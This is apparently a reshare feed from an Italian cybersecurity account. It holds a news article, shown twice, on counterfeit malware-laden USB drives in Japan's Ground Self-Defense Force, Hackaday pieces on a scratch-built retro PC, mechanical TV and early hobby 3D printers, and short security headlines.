Tutto inizia con il terremoto della penisola di Noto nel gennaio 2024. Durante le operazioni di soccorso, l’headquarter del Middle Army della JGSDF a Itami, nei pressi di Osaka, riceve otto chiavette USB da fonti esterne all’Ishikawa Prefecture come parte della risposta all’emergenza. I dispositivi, acquistati a prezzi ben al di sotto di mercato tramite canali non ufficiali, vengono distribuiti senza verifiche adeguate e collegati a sistemi operativi. Le scansioni di sicurezza obbligatorie, che avrebbero dovuto rilevare anomalie prima dell’utilizzo, falliscono nel identificare il payload malevolo nascosto nel firmware delle chiavette.

La tecnica non è nuova, ma rimane devastantemente efficace: il malware si annida a livello di controller USB, operando al di sotto del sistema operativo e risultando invisibile agli strumenti di endpoint detection standard. L’esecuzione è automatica — nessuna interazione dell’utente è richiesta al di là dell’inserimento del dispositivo nella porta USB.

Undici mesi di presenza silenziosa


La compromissione rimane non rilevata per quasi un anno. È solo nel febbraio 2025 che un soldato di stanza a Itami nota il suo computer funzionare in modo insolitamente lento. La scansione del sistema rivela un virus che opera silenziosamente in background da mesi. A quel punto, secondo l’inchiesta di Nikkei, oltre 50 computer avevano già interagito con le chiavette infette — con quasi la metà di questi sistemi appartenente a reti chiuse utilizzate per la gestione di informazioni altamente classificate, inclusi movimenti di truppe e pianificazione operativa.

L’analisi forense dei dispositivi ha rilevato che sei delle otto chiavette distribuite durante l’operazione di soccorso contenevano lo stesso malware. Il ceppo è stato documentato da una società di cybersecurity statunitense come riconducibile a un gruppo di hacker sponsorizzato dallo Stato cinese, presentando pattern di comunicazione con infrastrutture C2, tecniche di offuscamento e modalità di deployment del payload coerenti con campagne di cyberspionaggio di matrice cinese.

Caratteristiche tecniche del malware


Il malware incorporato nei controller USB delle chiavette contraffatte presenta diverse caratteristiche tecniche rilevanti per i difensori:

  • Esecuzione automatica alla connessione (AutoRun firmware-level): il codice malevolo si attiva al momento dell’inserimento, senza richiedere l’interazione dell’utente o l’abilitazione di funzionalità AutoRun a livello OS — il tradizionale metodo di difesa risulta quindi inefficace.
  • Operatività below-OS: il malware opera a livello di firmware del controller USB, rendendo invisibile la sua presenza agli strumenti di endpoint detection convenzionali che operano sopra il livello del sistema operativo.
  • C2 covert channel: pattern di comunicazione C2 coerenti con APT cinesi documentati, con tecniche di offuscamento del traffico di rete progettate per simulare traffico legittimo.
  • Payload modulare: capacità di raccogliere metadata di sistema, accedere a file sensibili ed esfiltrare dati anche in ambienti air-gapped attraverso timing covert channel.
  • Evasione di scan standard: sei dispositivi su otto hanno superato le scansioni di sicurezza obbligatorie, suggerendo una progettazione specifica per eludere i tool AV/EDR in uso negli ambienti militari giapponesi.


# IoC e indicatori di compromissione documentati (aggregati da fonti pubbliche)
Vettore: USB firmware-level malware
Origine hardware: dispositivi contraffatti prodotti in Cina, venduti su marketplace online a prezzi anomalmente bassi
Distribuzione: canali non ufficiali durante operazioni di emergenza (terremoto Noto, gennaio 2024)
Esecuzione: automatica all'inserimento USB, nessuna interazione richiesta
Sistemi colpiti: Windows (ambienti military-grade JGSDF)
Rilevamento: febbraio 2025, dopo ~11 mesi di presenza silenziosa
Attribuzione: ceppo documentato come China-linked da vendor statunitense (nome non divulgato)
C2 pattern: traffico HTTP/S offuscato verso IP non pubblicamente rivelati
Impatto: 50+ computer, ~50% su reti classificate (movimenti truppe, pianificazione operativa)
Settori colpiti oltre JGSDF:
- Impianti manifatturieri (fabbriche di elettronica)
- Laboratori di ricerca chimica
- Studi di ingegneria
- Potenzialmente altri acquirenti dei drive online

Il silenzio istituzionale: una seconda vulnerabilità


Altrettanto allarmante è la gestione post-discovery. Dopo aver scoperto la compromissione nel febbraio 2025, la JGSDF ha scelto di mantenere l’incidente riservato, senza allertare il pubblico né emettere avvisi ai potenziali altri acquirenti degli stessi drive disponibili online. Una decisione che ha lasciato esposti fabbriche, laboratori di ricerca e istituti di ingegneria in tutto il Giappone che avevano acquistato gli stessi dispositivi contraffatti attraverso retailer online, come documentato nell’inchiesta follow-up di Nikkei. Lo stesso malware, con le stesse caratteristiche tecniche, continuava a diffondersi attraverso la supply chain commerciale mentre le forze armate tacevano.

Il Ministero della Difesa ha confermato solo che una chiavetta USB acquisita dalla JGSDF Middle Army headquarters è stata trovata contenere malware nel febbraio 2025, fermandosi ben al di sotto di una disclosure pubblica completa.

Contesto geopolitico: la strategia della “contaminazione silenziosa”


L’incidente si inserisce in un pattern più ampio di operazioni cyber cinesi contro infrastrutture militari e industriali in Asia-Pacifico. L’utilizzo di hardware contraffatto come vettore di compromissione, noto nel settore come hardware supply chain attack, presenta vantaggi operativi significativi rispetto agli attacchi software-based: bypassa i perimetri di rete, è difficile da attribuire in modo conclusivo, e può colpire sistemi air-gapped che sarebbero altrimenti irraggiungibili.

Il timing è particolarmente rilevante: l’operazione si sovrappone al periodo di tensione crescente nel Mar Cinese Orientale e alle dispute territoriali sulle isole Senkaku/Diaoyu, e avviene mentre il Giappone accelera la modernizzazione delle proprie capacità militari nell’ambito dell’AUKUS-Plus e della partnership con gli Stati Uniti. La capacità di monitorare movimenti di truppe e pianificazione operativa — anche prima di un eventuale conflitto — rappresenta un vantaggio strategico difficilmente sopravvalutabile.

Due righe per i difensori


  • USB allowlisting hardware: implementare soluzioni di controllo dell’accesso USB che verifichino l’identità del dispositivo a livello di firmware, non solo a livello di driver OS.
  • Validazione su sistemi isolati: tutti i dispositivi removibili devono essere sottoposti a scansione su sistemi dedicati e air-gapped prima di essere connessi a reti operative.
  • Procurement da vendor certificati: zero tolerance per dispositivi acquisiti tramite canali non ufficiali, indipendentemente da urgenze operative o logistiche.
  • Firmware integrity check: adottare tool in grado di analizzare il firmware del controller USB, non solo il contenuto del filesystem del dispositivo.
  • Zero Trust per removable media: trattare ogni dispositivo rimovibile come potenzialmente ostile, indipendentemente dalla provenienza apparente.
  • Incident disclosure tempestiva: un protocollo di notifica coordinata agli stakeholder potrebbe aver limitato la diffusione del malware attraverso la supply chain commerciale.

L’incidente delle chiavette USB nelle JGSDF è un promemoria brutale che la supply chain dell’hardware — specialmente per dispositivi a basso costo prodotti in contesti geopoliticamente sensibili — rappresenta un vettore di attacco che le organizzazioni ad alta sicurezza non possono permettersi di sottovalutare. La semplicità del vettore, una chiavetta USB da pochi dollari distribuita durante un’emergenza, rende la lezione ancora più amara.


Hackaday Europe 2026 – Building A Retro PC From Scratch


The media in this post is not displayed to visitors. To view it, please log in.

If you’re big into retrocomputing, you probably spend a lot of time chasing parts and machines on online classifieds or through local swap meets. But what if there was a different way to build a classic retro PC? What if you could put one together from bare chips, from the ground up?

[Jeroen Domburg] is no stranger to the pages of Hackaday. You might know him by his alias, [sprite_tm], under which he’s shared many projects, from miniaturizing old hardware to unearthing the secrets of undocumented commercial hardware. Now, he’s turning his considerable skills to figuring out how to build a retro PC in today’s world, and came to Hackaday Europe 2026 to show us all how it’s done.

Game On


youtube.com/embed/ojQ9nnoR9uY?…

[Jeroen’s] goal was simple—to build a powerful retro gaming PC from the ground up. The first thing to decide was which era to target, with [Jeroen] deciding that 1995 seemed the most personally relevant to his interests. This was the peak of the MS-DOS gaming era, before things like DirectX came in and the culture shifted to Windows gaming and the domination of 3D over all else.

What does a good 1995 machine look like? It was probably rocking a 486, or maybe a Pentium, with somewhere between 8-16 MB of RAM. You had a simple video card primarily built for 2D graphics, and a sound card that was probably some variant of Sound Blaster or other. [Jeroen] wanted to build such a machine with as much real silicon as possible, rather than just emulating hardware from this era, and he wanted to do this himself at the component level, rather than just plugging in bits and pieces from eBay. Building a vintage-style PC motherboard from scratch and getting it up and running is a bit of a job, but luckily [Jeroen] has the skills to make it possible.

[Jeroen]’s first attempt had issues, mostly because it was difficult to properly solder the big BGA CPU package.While [Jeroen] was looking to the past, he also wanted to take advantage of modern quality of life improvements, mainly by eliminating mechanical parts. Old hard drives and floppy drives from this era are seriously showing their age by now, and becoming particularly unreliable. There are better storage solutions available today that are faster and easier to use. The choice was also made to use modern peripherals, rather than relying on 30-year-old keyboards and mice.

The core of the build was an AMD Elan SC520, running at 133 MHz. This was one of the so-called “586” chips that were spawned following the 486 era, in [Jeroen’s] words, being a “486 but a bit souped up.” This chip came out in 2000, a full six years after Intel curtailed 486 production, a time when the Pentium III was already hitting 1 GHz clock speeds. It’s an anachronistic choice for a 1995 machine, but [Jeroen] picked it for good reason. The Elan SC520 was more of a system-on-chip, integrating lots of supporting low-level hardware onto the CPU itself, like the real-time clock and programmable interval timer (PIT), which would make his build easier. [Jeroen] threw this on a board with an FPGA and an ESP32 and a smattering of support components, and got a general purpose machine up together in a tiny form factor. If you’re thinking of a Raspberry Pi built with a knockoff 486, you’re not far off the money.
There was an early focus on just getting the basics up and running to get to a DOS prompt, before fleshing out the project and making it more feature complete. Credit: project slides
This first build had some issues that caused a lot of stress. Namely, the Elan SC520 was a large BGA, and it was difficult to verify if it was perfectly soldered or not. This meant that as [Jeroen] worked on the board and spun up the supporting FPGA and such, it was very difficult to know if things weren’t working because of his own code or because of a missing solder ball or a short. This led him to return to the drawing board.
The second attempt had a cleaner design, using a classic CPU instead of a later-model system-on-chip. This proved far easier to solder.
The second attempt involved a regular CPU rather than the difficult-to-wrangle AMD system-on-chip. Namely, a classic i486 DX4-100 and AM486DX5-133 were sourced as potential CPU options. A C&T F65545 VGA chip was enlisted to handle graphical duties, being a laptop chipset that integrated lots of necessary support hardware into the one package. The plan was to throw just about everything else into an ECP5 LFE5UM-45 FPGA chipset, plus an ESP32-S3 to act as a peripheral interface. [Jeroen] decided to use SDRAM, which was much newer than that typically used with a 486, but this was chosen for being easy to integrate with the FPGA. With a goal to just get to a DOS prompt, [Jeroen] eliminated as much extraneous hardware as possible to get the project moving forward quickly. After spinning up a PCB, learning all about what it takes to bring up a 486-based machine, and working up the FPGA-based chipset, things all came together. A bit of cribbing from MiSTer projects helped, too. [Jeroen] eventually had his new old machine displaying a basic BIOS, then running some benchmarks, and then even running games like Commander Keen. The talk goes on to explain all the other little bits and pieces that come together, like storage, MIDI support, sound, and networking. Seeing it then turned into a portable game station named the Vapourdeck is just the icing on the cake.

Further work saw the single-board machine integrated into a gaming handheld that [Jeroen] has nicknamed the Vapourdeck.If you just want to play some retro games, your quickest route will still be emulation or just purchasing components to build a 90s spec machine. If you want to really learn what makes a classic 486-era machine work, though, it’s hard to beat this approach. [Jeroen] even notes that taking a similar approach to his could let you build something up to the 500 MHz range or so, based on the chipsets and CPUs available from way back when. If you want to learn more or pursue this yourself, it’s well worth poring over the talk and checking out the project files online. Happy hacking.


hackaday.com/2026/06/29/hackad…

Cybersecurity & cyberwarfare ha ricondiviso questo.

USB contraffatti made in China nelle reti classificate delle Forze di Autodifesa giapponesi: un anno di spionaggio silenzioso


Nikkei rivela come chiavette USB cinesi contraffatte, distribuite durante le operazioni di soccorso post-terremoto, abbiano compromesso per quasi un anno sistemi classificati delle Forze di Autodifesa Terrestre giapponesi. Il malware, riconducibile ad APT di Stato cinesi, ha colpito oltre 50 computer tra reti operative e classificate prima della scoperta.
The media in this post is not displayed to visitors. To view it, please go to the original post.

Tra marzo 2024 e febbraio 2025, le Forze di Autodifesa Terrestre giapponesi (JGSDF) hanno inconsapevolmente utilizzato chiavette USB contraffatte — prodotte in Cina e contenenti malware riconducibile a gruppi APT legati a Pechino — su computer collegati a reti classificate. La scoperta, rivelata da un’inchiesta di Nikkei Asia basata su documenti interni riservati, ha portato alla luce una delle operazioni di compromissione hardware più significative degli ultimi anni a danno di una forza armata del G7.

Il vettore di infezione: hardware come arma


Tutto inizia con il terremoto della penisola di Noto nel gennaio 2024. Durante le operazioni di soccorso, l’headquarter del Middle Army della JGSDF a Itami, nei pressi di Osaka, riceve otto chiavette USB da fonti esterne all’Ishikawa Prefecture come parte della risposta all’emergenza. I dispositivi, acquistati a prezzi ben al di sotto di mercato tramite canali non ufficiali, vengono distribuiti senza verifiche adeguate e collegati a sistemi operativi. Le scansioni di sicurezza obbligatorie, che avrebbero dovuto rilevare anomalie prima dell’utilizzo, falliscono nel identificare il payload malevolo nascosto nel firmware delle chiavette.

La tecnica non è nuova, ma rimane devastantemente efficace: il malware si annida a livello di controller USB, operando al di sotto del sistema operativo e risultando invisibile agli strumenti di endpoint detection standard. L’esecuzione è automatica — nessuna interazione dell’utente è richiesta al di là dell’inserimento del dispositivo nella porta USB.

Undici mesi di presenza silenziosa


La compromissione rimane non rilevata per quasi un anno. È solo nel febbraio 2025 che un soldato di stanza a Itami nota il suo computer funzionare in modo insolitamente lento. La scansione del sistema rivela un virus che opera silenziosamente in background da mesi. A quel punto, secondo l’inchiesta di Nikkei, oltre 50 computer avevano già interagito con le chiavette infette — con quasi la metà di questi sistemi appartenente a reti chiuse utilizzate per la gestione di informazioni altamente classificate, inclusi movimenti di truppe e pianificazione operativa.

L’analisi forense dei dispositivi ha rilevato che sei delle otto chiavette distribuite durante l’operazione di soccorso contenevano lo stesso malware. Il ceppo è stato documentato da una società di cybersecurity statunitense come riconducibile a un gruppo di hacker sponsorizzato dallo Stato cinese, presentando pattern di comunicazione con infrastrutture C2, tecniche di offuscamento e modalità di deployment del payload coerenti con campagne di cyberspionaggio di matrice cinese.

Caratteristiche tecniche del malware


Il malware incorporato nei controller USB delle chiavette contraffatte presenta diverse caratteristiche tecniche rilevanti per i difensori:

  • Esecuzione automatica alla connessione (AutoRun firmware-level): il codice malevolo si attiva al momento dell’inserimento, senza richiedere l’interazione dell’utente o l’abilitazione di funzionalità AutoRun a livello OS — il tradizionale metodo di difesa risulta quindi inefficace.
  • Operatività below-OS: il malware opera a livello di firmware del controller USB, rendendo invisibile la sua presenza agli strumenti di endpoint detection convenzionali che operano sopra il livello del sistema operativo.
  • C2 covert channel: pattern di comunicazione C2 coerenti con APT cinesi documentati, con tecniche di offuscamento del traffico di rete progettate per simulare traffico legittimo.
  • Payload modulare: capacità di raccogliere metadata di sistema, accedere a file sensibili ed esfiltrare dati anche in ambienti air-gapped attraverso timing covert channel.
  • Evasione di scan standard: sei dispositivi su otto hanno superato le scansioni di sicurezza obbligatorie, suggerendo una progettazione specifica per eludere i tool AV/EDR in uso negli ambienti militari giapponesi.


# IoC e indicatori di compromissione documentati (aggregati da fonti pubbliche)
Vettore: USB firmware-level malware
Origine hardware: dispositivi contraffatti prodotti in Cina, venduti su marketplace online a prezzi anomalmente bassi
Distribuzione: canali non ufficiali durante operazioni di emergenza (terremoto Noto, gennaio 2024)
Esecuzione: automatica all'inserimento USB, nessuna interazione richiesta
Sistemi colpiti: Windows (ambienti military-grade JGSDF)
Rilevamento: febbraio 2025, dopo ~11 mesi di presenza silenziosa
Attribuzione: ceppo documentato come China-linked da vendor statunitense (nome non divulgato)
C2 pattern: traffico HTTP/S offuscato verso IP non pubblicamente rivelati
Impatto: 50+ computer, ~50% su reti classificate (movimenti truppe, pianificazione operativa)
Settori colpiti oltre JGSDF:
- Impianti manifatturieri (fabbriche di elettronica)
- Laboratori di ricerca chimica
- Studi di ingegneria
- Potenzialmente altri acquirenti dei drive online

Il silenzio istituzionale: una seconda vulnerabilità


Altrettanto allarmante è la gestione post-discovery. Dopo aver scoperto la compromissione nel febbraio 2025, la JGSDF ha scelto di mantenere l’incidente riservato, senza allertare il pubblico né emettere avvisi ai potenziali altri acquirenti degli stessi drive disponibili online. Una decisione che ha lasciato esposti fabbriche, laboratori di ricerca e istituti di ingegneria in tutto il Giappone che avevano acquistato gli stessi dispositivi contraffatti attraverso retailer online, come documentato nell’inchiesta follow-up di Nikkei. Lo stesso malware, con le stesse caratteristiche tecniche, continuava a diffondersi attraverso la supply chain commerciale mentre le forze armate tacevano.

Il Ministero della Difesa ha confermato solo che una chiavetta USB acquisita dalla JGSDF Middle Army headquarters è stata trovata contenere malware nel febbraio 2025, fermandosi ben al di sotto di una disclosure pubblica completa.

Contesto geopolitico: la strategia della “contaminazione silenziosa”


L’incidente si inserisce in un pattern più ampio di operazioni cyber cinesi contro infrastrutture militari e industriali in Asia-Pacifico. L’utilizzo di hardware contraffatto come vettore di compromissione, noto nel settore come hardware supply chain attack, presenta vantaggi operativi significativi rispetto agli attacchi software-based: bypassa i perimetri di rete, è difficile da attribuire in modo conclusivo, e può colpire sistemi air-gapped che sarebbero altrimenti irraggiungibili.

Il timing è particolarmente rilevante: l’operazione si sovrappone al periodo di tensione crescente nel Mar Cinese Orientale e alle dispute territoriali sulle isole Senkaku/Diaoyu, e avviene mentre il Giappone accelera la modernizzazione delle proprie capacità militari nell’ambito dell’AUKUS-Plus e della partnership con gli Stati Uniti. La capacità di monitorare movimenti di truppe e pianificazione operativa — anche prima di un eventuale conflitto — rappresenta un vantaggio strategico difficilmente sopravvalutabile.

Due righe per i difensori


  • USB allowlisting hardware: implementare soluzioni di controllo dell’accesso USB che verifichino l’identità del dispositivo a livello di firmware, non solo a livello di driver OS.
  • Validazione su sistemi isolati: tutti i dispositivi removibili devono essere sottoposti a scansione su sistemi dedicati e air-gapped prima di essere connessi a reti operative.
  • Procurement da vendor certificati: zero tolerance per dispositivi acquisiti tramite canali non ufficiali, indipendentemente da urgenze operative o logistiche.
  • Firmware integrity check: adottare tool in grado di analizzare il firmware del controller USB, non solo il contenuto del filesystem del dispositivo.
  • Zero Trust per removable media: trattare ogni dispositivo rimovibile come potenzialmente ostile, indipendentemente dalla provenienza apparente.
  • Incident disclosure tempestiva: un protocollo di notifica coordinata agli stakeholder potrebbe aver limitato la diffusione del malware attraverso la supply chain commerciale.

L’incidente delle chiavette USB nelle JGSDF è un promemoria brutale che la supply chain dell’hardware — specialmente per dispositivi a basso costo prodotti in contesti geopoliticamente sensibili — rappresenta un vettore di attacco che le organizzazioni ad alta sicurezza non possono permettersi di sottovalutare. La semplicità del vettore, una chiavetta USB da pochi dollari distribuita durante un’emergenza, rende la lezione ancora più amara.

reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

NEW: In a major privacy win, the U.S. Supreme Court has ruled that authorities need to get a search warrant when requesting historical "geofence" cellphone location data.

Feds will need to show probable cause when requesting these type warrants, the court ruled, as "an individual has a reasonable expectation of privacy in his cell-phone location information.”

The Supreme Court ruled that historical cellphone location data, even if collected by a third party such as Google, is protected by the 4th Amendment.

techcrunch.com/2026/06/29/in-m…

reshared this

Mechanical TV, Without The Benefit Of New Parts


The media in this post is not displayed to visitors. To view it, please log in.

There are many experimenters who have had a go at a mechanical television, and though there are a few challenges, it’s a relatively straightforward project in 2026. A hundred years ago though it was still beyond the cutting edge of technology, and that’s where [Paul Kocyla] is placing his build. It’s a mechanical TV system, using only parts that would have been available in the 1920s. The project isn’t finished yet, but we suggest following along for some fascinating insights into developments in early electronics.

As it stands he has a wooden chassis, a period power supply and amplifier, a synchronous motor, and of course the Nipkow disk that makes it all possible. The electronics aren’t quite finished, and he’s yet to source a neon lamp. This last party may be particularly tricky, as there were specific flat-plate neon lamps made for this application. It’s interesting to find that the motor would synchronize to the grid frequency and would need to be restarted a few times for the frame to be in the right place.

His last posting contains a particularly interesting nugget of information for anyone using tubes. The amplifier carries a 120 Hz hum, something difficult to trace. The culprit is the early tubes with directly heated cathodes formed from the heaters themselves; they had such a low thermal mass that they would “blink” at 120 Hz if fed with AC. A set of period copper oxide rectifiers solve this by feeding DC to the heaters. There’s a YouTube series to follow, and we’ve placed the most recent one in which he fixes the power supply, below the break.

Back in January, we marked the hundredth anniversary of mechanical TV’s invention. Meanwhile, some of us have been known to experiment in this direction too.

youtube.com/embed/lZjshCp_llQ?…


hackaday.com/2026/06/29/mechan…

Tyorgg reshared this.

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

DirtyClone: la nuova LPE su Linux che permette di diventare root senza toccare il disco

📌 Link all'articolo : redhotcyber.com/post/dirtyclon…

A cura di Luigi Zullo

#redhotcyber #news #cybersecurity #hacking #linux #vulnerabilita #sicurezzainformatica

The Teenage Angst of 3D Printing: Solidoodle, Printrbot, and Bridges


The media in this post is not displayed to visitors. To view it, please log in.

Bridges are a part of our constructed landscape that we take for granted. And bridges by themselves aren’t especially important. What is important is that bridges let you get from one place to another. Technology is often the same. We get from point A to point B through some bridge technology that, probably, most normal people never even notice.

Years ago, point A was commercial 3D printing. Industry had stereolithography, selective laser sintering, fused deposition modeling, and other rapid-prototyping technologies. These were not toys. They were expensive industrial systems used by companies that needed prototypes badly enough to pay serious money for them.

Fast Forward to Today


Today, you can go to a big box store and buy a 3D printer for well under $1,000, and often far less. Modern machines are almost plug-and-play and tend to do all the hard parts for you. That’s point B. How we got between points is a story of hackers who had a dream, and many Hackaday readers lived through it and even played a part in that bridging.

For a long time, RepRap was synonymous with hobby-level 3D printing. The project, started by [Adrian Bowyer] at the University of Bath in 2005, was built around a powerful idea: a machine that could print many of its own parts, thereby helping make more machines. RepRap Darwin reached its early self-replicating milestones in 2008, and the movement produced a thicket of descendants, variants, and arguments about rods, belts, bearings, extruders, firmware, and what “self-replicating” really meant. Of course, the machine could only print some of the parts you needed, but it was still impressive how much of a printer you could make with one printer.

Without RepRap, the desktop 3D printer boom would have looked very different. It created a common pool of ideas: Cartesian frames, printed brackets, hobbed bolts, heated beds, RAMPS boards, Marlin firmware, and a whole common vocabulary. It also created the expectation that a 3D printer was something you could understand, modify, repair, and improve. That expectation would not survive everywhere, but it defined the early culture.

Kicking Kickstarter


By the early 2010s, 3D printing had the right ingredients for a crowdfunding explosion. The technology was visible enough to be exciting, but not yet mature enough to be boring or attract big players. Hackerspaces were multiplying. Arduino had made embedded tinkering feel approachable. Laser-cut plywood, stepper drivers, and commodity motion hardware were easy to source. There were enough RepRap veterans to know what worked, and enough newcomers to believe the next machine would finally make 3D printing simple.

Kickstarter was a perfect amplifier. A desktop 3D printer looked good in a campaign video. It moved. It made things. It appeared to turn imagination directly into plastic. Printrbot was one of the defining examples. [Brook Drumm’s] original Printrbot campaign launched in 2011 and became one of the notable early 3D printer crowdfunding successes, raising far beyond its initial goal. The pitch was seductive: a printer you could afford, build, and actually use. Not an industrial system, not a laboratory instrument, but your first 3D printer.

I had a Printrbot Plus built from a kit, and that experience says a lot about the period. It was not a toaster. It was not even quite a drill press. It was more like buying a small CNC machine from a bright, optimistic friend who assumed you owned calipers, weren’t afraid of firmware, and could recognize when a machine was racking itself out of square. You can see some very old YouTube videos of my machine below.

youtube.com/embed/B_45eb4mxFQ?…

youtube.com/embed/4R95ksXfHMA?…

The Printrbot was charming because it was so direct. There was very little mystery in it. It was made from wood! Even some of the gears were wooden. You could see the rods, belts, pulleys, endstops, and wiring. You could also see the compromises. The Printrbot used LM8UU linear bearings that were, in some cases, held in place with zip ties. This was not necessarily as terrible as it sounds; zip ties are a valid engineering material if your tolerance stack and expectations are sufficiently charitable. But the bearings could be a little loose. The folk remedy was equally period-correct: jam a bit of 3 mm filament in there as a wedge to keep the bearing from wiggling.

That little trick captures the mood of the time. The printer came from a factory, or at least from a company, but it still expected you to meet it halfway. It was full of these tiny bits of tribal knowledge. Blue tape on glass. Hairspray. Kapton. ABS juice. Tighten the belts, but not too much. Level the bed with a piece of paper, unless you had a feeler gauge, unless the bed was warped, in which case all bets were off. If the extruder skipped, maybe the nozzle was clogged, or the filament was too fat, or the hot end was too cold, or the hobbed gear was packed with dust, or the phase of the moon was affecting your controller board. Ok, maybe not the last one.

Solidoodle


Solidoodle was another emblem of that period. Founded in 2011 by [Sam Cervantes], the company pushed hard on affordability, with early machines such as the Solidoodle 2 attracting attention partly because they promised a usable enclosed printer at a price that seemed startling at the time. Wired covered the Solidoodle in 2012 as an assembled $499 machine, which was exactly the sort of price that made people start thinking desktop 3D printing might jump from hackerspaces to ordinary homes.

youtube.com/embed/AgejJ6EWvHM?…

The Solidoodle story also shows the danger of that moment. The market wanted cheap, reliable, attractive, assembled, easy-to-use machines. The technology could supply maybe three of those at once. Companies were trying to scale production, support beginners, improve hardware, and hit aggressive prices while the entire field was still learning what “reliable” even meant for a low-cost filament printer. Solidoodle eventually suspended operations in 2016, a fate that befell more than one early desktop 3D printing company.

Part of Solidoodle’s problem was that they were too invested in the original RepRap idea. I almost bought a Solidoodle because I was fearful of trying to put a kit together with so many mechanical parts. Why didn’t I? Because RepRap lead times were enormous. At least part of the problem was that they were using Solidoodle printers to produce parts for Solidoodle printers.

Say you have ten printers. You get orders for 100. Great, right? But getting parts for those 100 printers done on your ten printers will take a long time. Of course, you could take the first ten to help, but now you can only ship 90 printers. If you only had 100 orders, you’d be fine. But in the printer-starved 2010s, a cheap printer like Solidoodle or Printrbot would get orders faster than they could fill them, and had to decide if they’d fill orders faster or try to make do with their existing printer farms. There really isn’t a right answer to that question. We heard that [Brook], for example, expected to sell 50 printers through Kickstarter. They wound up with a backlog of over 1,000 printers. Within a year they had $2 million in sales and it went up from there. Until, of course, it didn’t.

MakerBot


MakerBot deserves mention here, too, although it occupies a slightly different lane. It started in the open-source maker world and became the company most associated with the dream of consumer 3D printing. For a while, it seemed like MakerBot might become the Apple II of 3D printers. Instead, it became a cautionary tale about trying to turn a hacker tool into a mass-market appliance too quickly. The machines got slicker, the company moved away from its open-source roots, and the consumer revolution failed to arrive on schedule. By 2016, even mainstream coverage was asking what happened to the 3D printing revolution that had been promised.

But failure is too simple a word. The Kickstarter-era machines did not fail in the way that, say, a fad diet fails. They moved the ball down the field. They trained a generation of users. They revealed what mattered: rigid frames, better motion systems, predictable extrusion, heated beds that stayed flat (or, at least, were corrected in software), slicers that didn’t require a sacrificial offering, and firmware that could recover from ordinary user behavior. They also created demand. People who bought a Printrbot or a Solidoodle might have cursed it, modified it, and eventually replaced it, but they knew what they wanted next.

And what they wanted next was cheaper and better. That leads to the next wave: the low-cost commodity printers. The Monoprice Select Mini was one of the machines that made people do a double-take (see the video below). It was small, inexpensive, and not especially glamorous, but it was also a complete 3D printer at a price (around $200) that, up to that point, had seemed impossible. The Anet A8 represented another branch of the same tree: a very cheap kit printer, descended in spirit from RepRap machines, that put a large-ish build volume within reach of people willing to accept risk, tinkering, and sometimes questionable electrical design.

youtube.com/embed/BAE_Iyr3sHo?…

The End?


These machines were not the end state either. The cheap printers democratized access, but many still required an operator rather than a mere owner. The Anet A8 in particular became infamous not just for its low price but for the upgrades people considered mandatory: better firmware settings, frame braces, MOSFET boards, power supply caution, and general fire-safety paranoia. Still, it mattered. A rough kit at $150 or $200 changes a market. It lets students, hackers, model builders, repair-minded homeowners, and the merely curious take a chance. My A8 is unrecognizable today with an aluminum frame and a 32-bit controller board, a proper 24V power supply, a custom hot end mount, and other enhancements.

You can see my original A8 (and a peek at the Printrbot in the background) in the video below.

youtube.com/embed/40OjGFAajfk?…

A few years later, it looked like this video.

youtube.com/embed/IG5YceFKt48?…

The real consumer-ready printers came later, after years of iteration. Auto bed leveling became common. Filament paths improved. Machines got stiffer. Slicers became far better. PEI spring steel sheets replaced a lot of glass-and-hairspray rituals. Direct drive and better Bowden setups reduced extrusion drama. Enclosed CoreXY machines brought speed without quite so much ringing and finagling. Companies learned that the printer had to be a system: hardware, firmware, slicer profiles, materials, documentation, and support.

Right, Yet Wrong


Looking back, the funny thing is that the early hype was both wrong and right. Desktop 3D printers did not become like inkjet printers, and they certainly did not become like microwave ovens. Most people do not need to manufacture a plastic bracket before breakfast. Most people do not want to think about layer adhesion, nozzle wear, or whether that weird clicking noise is the extruder eating the filament.

I lived through the time when the hacker dream was that every home would have a computer. Most of us didn’t see what would really happen. Every person has at least one computer; every home has dozens. But we were on the right track; most of us just didn’t see what would drive it. But I never really thought 3D printers would become as common as personal computers.

I did think it might become like a drill press. Not everyone has a drill press. In fact, most people probably do not. But no one is amazed to learn that you have one. It is a normal thing for a certain kind of person to own. If you fix things, build things, make brackets, or restore equipment, a drill press is not exotic. It is just one of the tools that may live in the shop.

That is where 3D printing has largely landed. Not universal, but ordinary. A decade ago, saying you had a 3D printer was a conversation starter. People wanted to see it move. They wanted to know if you could print a wrench, a phone case, a toy, or, inevitably, another printer. Today, in technical circles, saying you have a 3D printer is more like saying you have a bench vise. The interesting question is not whether you have one, but what you use it for.

That normalization is the real legacy of the awkward Kickstarter era. Those machines were crude, but they were legible. They let us see the process. They forced us to learn what mattered. They converted 3D printing from an industrial service into a shop skill. A Printrbot with zip-tied LM8UU bearings and bits of filament jammed in as shims was not a consumer appliance. It was a bridge.

And like many bridges, it was not the destination. It was the thing that got us there. Of course, things continue to move. Maybe one day we will look back on the current generation of printers and wonder how we ever used them. But, like the personal computer, we probably can’t imagine what is going to drive the adoption of those new machines.


hackaday.com/2026/06/29/the-te…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Palo Alto GlobalProtect VPN Authentication Bypass CVE-2026-0257 Under Active Exploitation — Patch Now
#CyberSecurity
securebulletin.com/palo-alto-g…
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

LokiBot Returns: Multi-Stage JScript Campaign Uses Process Injection to Steal Credentials
#CyberSecurity
securebulletin.com/lokibot-ret…
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

AWS AiTM Phishing Kit Bypasses MFA to Hijack Cloud Console Sessions in Real Time
#CyberSecurity
securebulletin.com/aws-aitm-ph…
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

macOS.Gaslight: North Korea-Linked Rust Backdoor Exfiltrates Data via Telegram and Poisons AI Analysis Tools
#CyberSecurity
securebulletin.com/macos-gasli…
Cybersecurity & cyberwarfare ha ricondiviso questo.

Culatello, San Daniele, salame o #Emma-5?

La fiducia negli LLM dopo la figuraccia di un prodotto non sufficientemente addestrato e la spocchia di chi "è colpa degli utenti gné gné gné".

Ne parlo nel mio #PacktHunters per #Baited: blog.baited.io/2026/emma-5-ego…

reshared this

